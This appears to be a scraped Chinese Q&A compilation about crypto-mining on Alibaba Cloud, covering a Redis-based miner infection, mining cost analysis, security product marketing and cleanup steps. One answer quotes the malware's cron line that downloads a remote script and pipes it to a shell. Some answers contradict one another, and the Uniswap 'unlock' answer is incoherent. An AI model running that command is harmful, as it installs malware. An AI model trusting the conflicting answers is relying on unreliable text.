阿里雲挖礦鎖定

⑴ 阿里雲yum工具和出站80埠不可用的問題排查一例

收到阿里雲簡訊/站內信提醒，線上某資源被病毒入侵。查看告警詳情及登錄伺服器後確認是感染了DDG挖礦病毒，入侵點是redis。由於病毒行為復雜，難以徹底清除對系統的修改，決定重置該實例然後重新部署服務。

實例重置後，發現yum無法使用。提示yum連接超時，連接的目標主機是阿里雲的yum源（233.*的IP地址，為外網地址），協議為HTTP。

進一步測試發現DNS解析正常，curl訪問內網的80埠正常，訪問外網所有80埠均超時，訪問外網的8080/443等部分非80埠正常。

經檢查機器的iptables沒有啟用，阿里雲安全組出站方向無限制。隨後提交工單聯系阿里雲。

售後客服在工單中答復，之前機器被檢測到有大量web攻擊行為，阿里雲已對該實例進行了出站特定埠封禁處理。在工單內表示問題已經排除後，客服提前人工解除封禁。

這類封禁處理不會體現在安全組，可以在 雲盾安全管控管理控制台 來查看封禁記錄。這個控制台也可以在阿里雲控制台右上角賬戶圖標--安全管控--處罰列表處進入。另外，處罰通知也會以站內信的方式發送（是否有簡訊暫不明確），所以及時查收站內信非常必要。

作為RAM用戶身份登錄難以保持登錄狀態，同時主賬號對通知方式的設置不合理，加上對阿里雲檢測和通知機制不夠熟悉，導致這次問題排查持續時間較久。

阿里雲 yum 出站 埠 封禁 入侵

⑵ 阿里雲允許用雲主機挖礦嗎

VPS提供商一般都不允許雲主機進行挖礦，一旦發現就會被封禁，而且本來就對挖礦進行了限制，本身你就無法使用雲主機進行挖礦，而且性能也達不到挖礦的標准。

⑶ 雲伺服器挖礦踐行 第一篇

三天以前看到壯鄉金榮仔的文章，從中了解到可以利用阿里雲伺服器進行挖礦，收益可觀，於是立即和作者進行了聯系，咨詢拜師的事情。

通過和孫師傅交流發現，因為寫作讓我們有了很多共同交流的基礎，並且我居然已經關注了孫師傅有好幾個月的時間了，這讓我們很快建立了信任。

孫師傅在文章中提到正式收徒弟還要等一段時間，我覺得這段時間也不能浪費，還應該為將來拜師以後做一點准備工作。於是我立即開始對雲服務挖礦這件事情進行了認真的思考並實踐。

雲服務挖礦的可行性，大概有這么幾個方面。

一，雲伺服器挖礦的成本收益分析。

成本構成：挖礦的成本主要有三項，礦機的支出，電費，場地及相關管理費用；

收益構成：挖礦的收益主要來自兩個方面，一是按照當前數字貨幣的法幣價格可以不管成本而獲得的收益，二是數字貨幣在未來增值獲得的收益。

分析：雲伺服器的運算能力遠遠低於實體礦機，但是不用支付電費，這是最大的成本節省，另外，由於不需要場地，自己遠程管理，場地和管理費用也趨近於零。

因此在算力有限的情況下，雲伺服器挖礦最大限度地消除了電費和場地的費用，這是這項技術的優勢所在。而盈利的平衡點，將極大的取決於伺服器費用的支出和當前幣價的相對關系。

二，雲伺服器和挖礦幣種的分析。

雲伺服器的種類有很多，主要分兩種，CPU型和GPU型。

目前市場上的各種虛擬幣演算法也分兩類，GPU友好型和CPU有好型。比特幣以太坊，萊特幣等絕大多數幣種都屬於GPU友好型，CPU友好型比較少，我了解到的只有大零幣zec,小零幣xzc,門羅幣xmr。

所以這樣一來，在伺服器和幣種的選擇問題上，方向很清晰：CPU和GPU任何一個方向，選擇算力性價比最高的雲伺服器和挖礦收益最高的幣種。

三，實踐。

李笑來的文章中提到過，任何挖礦的行為都不如直接到市場上去買來得容易。我也因此在之前的虛擬貨幣的學習中，很少關注挖礦的知識。同時對於伺服器方面的知識也了解很少，所以一開始我只能用網路上能夠搜索得到的辦法進行實踐， 以快速入門，開始積累。

網上能夠直接搜索到的就是利用CPU伺服器挖掘門羅幣。文章鏈接如下。

於是我花了391.5元購買了三個月的阿里雲輕量型伺服器，配置如下。阿里雲目前在搞活動，首單可以打七折。

開始進行實踐。

經過了兩天的折騰，終於在運行伺服器上挖礦成功，但是算力只有140h/s，在這個算力下，要虧本一半。

具體折騰的過程中，遇到坑無數，也麻煩了我搞計算機的朋友很多，這個過程留待下一篇再寫吧。

四，關於風險的思考。

目前來看，用雲伺服器挖礦伺服器的價格是預付的，並且是固定的，所以挖礦是否有收益，取決於目前的虛擬貨幣的價格。從孫師傅的截圖來看，目前收益還是很可觀的。

近期的風險來自於幣價的下跌，遠期的風險來看，就是阿里雲伺服器會禁止挖礦行為。阿里雲對於挖礦的行為，在網上有過很多的聲明。在搜索伺服器挖礦相關知識的時候，也發現有國外的伺服器禁止挖礦。

長期來看，如果目前雲伺服器挖礦不賠本那麼未來大概率是會有很大的收益的。

就在寫這一篇的過程中，孫師傅的收徒標也發出來了，很快就要收徒弟啦。我也正好把這一篇當做我第一這周的作業。

⑷ 阿里雲雲安全中心是什麼可以為我們提供哪些安全保障

現在很多用戶上雲並不只是購買雲伺服器就完事了，為了保障網站或者應用的響應速度和安全，往往還會使用諸如CDN、雲安全中心、DDOS高仿等雲產品，其中雲安全中心是用戶購買比較多的一個安全類雲產品，下面為大家解析下雲安全中心是什麼？可以為我們提供哪些安全保障？

雲安全中心（態勢感知）是一個實時識別、分析、預警安全威脅的伺服器主機安全管理系統，通過防勒索、漏洞掃描修復、防病毒、防篡改、合規檢查等安全能力，幫助用戶實現威脅檢測、響應、溯源的自動化安全運營閉環，保護雲上主機、本地伺服器和容器安全，並滿足監管合規要求。產品詳情介紹可參考： 雲安全中心-態勢感知-漏洞掃描-安全-阿里雲

1、【飛天會員專享】飛天會員用戶享防篡改包年75折優惠， 點此進入阿里雲飛天會員中心了解
2、優惠活動【ECS首購專享】首購1核2G爆款雲伺服器+雲安全中心首年97.02元起， 點此進入阿里雲伺服器精選特惠活動購買

1、防病毒版
雲安全中心安全專家團隊通過對海量病毒樣本、持久化、攻擊方式的自動化分析，推出阿里雲機器學習病毒查殺引擎，實現一鍵式病毒查殺處置能力。
2、高級版
高級版支持漏洞修復、查殺病毒木馬，勒索軟體，挖礦病毒。如果需要全面的威脅檢測能力、基線檢查和攻擊自動溯源，建議啟用功能更強的企業版。
3、企業版
企業版是實時識別、分析、預警安全威脅的統一安全管理平台，幫助您實現威脅檢測、響應、溯源、防禦的自動化安全運營閉環，有效保護雲上資產和本地主機並滿足監管合規。
4、旗艦版〔容器安全)
旗艦版是主機、容器環境的統一安全管控平台，提供全面的運行時威脅檢測，容器網路可視化、鏡像安全掃描、漏洞修復、基線檢查、雲平台配置檢查等功能，一站式解決安全威脅。

1、安全預防

1、等保合規場景
對於等保2.0二級和三級中針對伺服器主機安全的入侵防範、身份鑒別、安全審計等方面的要求，雲安全中心（態勢感知）可應答其中15+等保標準的要求項。
可提供的安全服務為：

2、混合雲主機安全場景
雲安全中心（態勢感知）支持阿里雲、線下IDC、其他雲廠商等多種環境下的伺服器主機，通過雲安全中心控制台實現對雲上、雲外伺服器的統一防護及運維，包括病毒查殺、漏洞掃描、防勒索等安全防護，降低安全管理成本。
可提供的安全服務為：

3、容器安全場景
基於阿里雲容器安全ATT&CK攻防矩陣，雲安全中心（態勢感知）重點關注容器構建、容器部署和容器運行三大生命周期階段，通過雲原生方式，多維立體構建容器安全能力，為企業雲上容器化進程提供全方位安全保障。
可提供的安全服務為：

1、穩定性
百萬級伺服器主機裝機量，資源佔用低CPU使用率低於10%，不影響客戶正常業務。
2、統一安全管理
支持對全網伺服器主機、容器、雲產品的威脅管控，可以部署在線下IDC及其他雲平台，統一管控。
3、安全閉環能力
主動攔截主流病毒木馬，全面漏洞掃描，可一鍵修復漏洞/基線不滿足項等，降低用戶運維成本。
4、全面攻擊檢測
收集3大類型14類伺服器主機日誌，250+威脅檢測模型提供全鏈路的威脅檢測能力。

⑸ 阿里雲深夜發文說什麼

阿里雲聲明：絕不會提 供「挖礦平台」和虛擬貨幣。

1月17日消息，近日有媒體報道，稱阿里巴巴已上線虛擬貨幣挖礦平台「P2P節點」，指出阿里正在招募礦機入駐。對此，阿里雲1月16日深夜發聲明辟謠，稱該業務與「挖礦平台」、「虛擬貨幣」等毫無關聯。阿里雲強調，絕不會發行任何比特幣之類的虛擬貨幣，也不會提供任何所謂的「挖礦平台」。對於虛假報道，將依法追究法律責任。

我們注意到近日有媒體報道稱阿里巴巴上線挖礦平台P2P節點。經核實，該業務實際上是阿里雲基於P2P技術的CDN（內容分發網路）業務，與「挖礦平台」、「虛擬貨幣」等毫無關聯。

P2P（對等網路）節點是指在CDN行業里常見的用戶共享帶寬加速服務。由用戶通過個人電腦、路由器等設備共享家庭閑置的上行網路帶寬，成為一個微型的CDN分發服務節點，使得其他客戶在下載、直播、游戲等場景時獲得就近加速體驗。

對於用戶授權共享的資源，阿里雲CDN以積分的形式給予獎勵，積分可以在積分類商城裡置換禮品，不具備貨幣功能和炒作價值。

我們再次聲明，阿里雲絕不會發行任何比特幣之類的虛擬貨幣，也不會提供任何所謂的「挖礦平台」。

對於捕風捉影的虛假報道，我們將依法追究法律責任。

阿里雲計算有限公司

2018年1月16日

⑹ 阿里雲windows伺服器如何去除挖礦病毒

找到進程，然後找到他文件路徑，幹掉進程，刪掉文件。
另外找找其他可疑進程，避免病毒有守護進程或者其他隱藏進程

⑺ utk挖礦如何解除鎖定

1、打開Coinhub錢包切換到ETH鏈後，點擊發現在頂部搜索「Uniswap」並點擊進入。
2、打開Uniswap，點擊資金池，選擇點擊+CreatePool來創建資金池功能，進入創建界面，選擇點擊Selectsecondtoken來創建ETH和新代幣的交易對。
3、新界面中在Selectatoken欄填入待增加代幣的合約地址後可以自動識別代幣的名稱、信息、和數量，點擊下方的代幣進入，進入下一界面可以看到新建的ETH新代幣的交易對，點擊CreatePool准備授權進行創建資金池，就可以解除鎖定。

⑻ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

⑼ 防火牆怎麼配置防挖礦

針對挖礦蠕蟲對SSH/RDP等進行暴力破解的攻擊方式，雲防火牆的基礎防禦支持常規的暴力破解檢測方式，如登錄或試錯頻次閾值計算，對超過試錯閾值的行為進行IP限制，還支持在用戶的訪問習慣、訪問頻率基線的基礎上，結合行為模型在保證用戶正常訪問不被攔截的同時對異常登錄進行限制。
針對一些通用的漏洞利用方式(如利用Redis寫Crontab執行命令、資料庫UDF進行命令執行等)，雲防火牆的基礎防禦基於阿里雲的大數據優勢，利用阿里雲安全在雲上攻防對抗中積累的大量惡意攻擊樣本，可以形成精準的防禦規則，具有極高的准確性。
若您需要開啟雲防火牆的基礎防禦，只需要在安全策略->入侵防禦->基礎防禦配置欄勾選基礎規則即可，當基礎防禦開啟後，在網路流量分析->IPS阻斷分析中可以看到詳細的攔截日誌。

⑽ 阿里雲允許用雲主機挖礦嗎

是可以的。很多挖礦項目都可以使用雲伺服器，例如最近火熱的Swarm bzz。但Swarm白皮書沒有提供挖礦的硬體配置推薦，然而目前，因為各類硬體采購價格高、到貨慢，然而時間不等人！綜合對比下來，針對BZZ挖礦，推薦雲伺服器！
像Swarm BZZ這樣的去中心化存儲的情況下，以太坊生態中的熱點數據每秒都在隨時被調用和存儲，所以除了CPU、內存和硬碟這三個主要的響應能力之外，還有一個要求寬頻傳輸速度。
使用雲伺服器來部署bzz節點，核心理由就是一個字「快」，節點早一分鍾上線，就能更早的獲取到頭礦！
經西部數碼上千bzz節點部署的實踐經驗證明，bzz節點需要較高的帶寬和超強的磁碟IO性能，以下是結合資源實際消耗情況合理搭配的配置。
4核CPU + 4G內存 + 100G SSD硬碟 + 20M帶寬。上述配置，可以部署一個節點。
如果需要部署多節點可以選擇多台這樣的雲伺服器，或者選擇更高配置的雲伺服器，如16核CPU + 24G內存 + 500G SSD硬碟 + 200M帶寬，可部署5-10個節點。